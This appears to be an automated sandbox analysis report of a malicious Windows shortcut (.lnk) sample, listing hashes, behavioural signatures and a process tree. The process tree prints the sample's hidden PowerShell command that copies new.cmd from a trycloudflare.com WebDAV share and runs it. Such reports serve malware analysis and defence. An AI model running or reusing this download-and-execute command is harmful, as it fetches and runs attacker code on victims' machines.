Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
29/05/2024, 02:09
Static task
static1
Behavioral task
behavioral1
Sample
7c638ccd49d5d661528c8cf5c91fe850dc4ec9dd8557c14552eda52361ce780f.lnk
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
7c638ccd49d5d661528c8cf5c91fe850dc4ec9dd8557c14552eda52361ce780f.lnk
Resource
win10v2004-20240508-en
General
-
Target
7c638ccd49d5d661528c8cf5c91fe850dc4ec9dd8557c14552eda52361ce780f.lnk
-
Size
2KB
-
MD5
7754aa44f62ebf8c88f72ae3671d54c1
-
SHA1
e13dd18e34b0a3a6cfbfa68984c6d16010578a92
-
SHA256
7c638ccd49d5d661528c8cf5c91fe850dc4ec9dd8557c14552eda52361ce780f
-
SHA512
e950be8a6d7570d5739e49b23b9eddae815bf57e23ca72519fd41b7c340928b2049f44721b6e0cb313a738dcbefcd3e867c761d46ef7f1600f88ed69dba88202
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2532 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2532 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1976 wrote to memory of 2532 1976 cmd.exe 29 PID 1976 wrote to memory of 2532 1976 cmd.exe 29 PID 1976 wrote to memory of 2532 1976 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\7c638ccd49d5d661528c8cf5c91fe850dc4ec9dd8557c14552eda52361ce780f.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\badly-andrea-act-barnes.trycloudflare.com@SSL\DavWWWRoot\new.cmd' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\new.cmd\" -WindowStyle Hidden"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532
-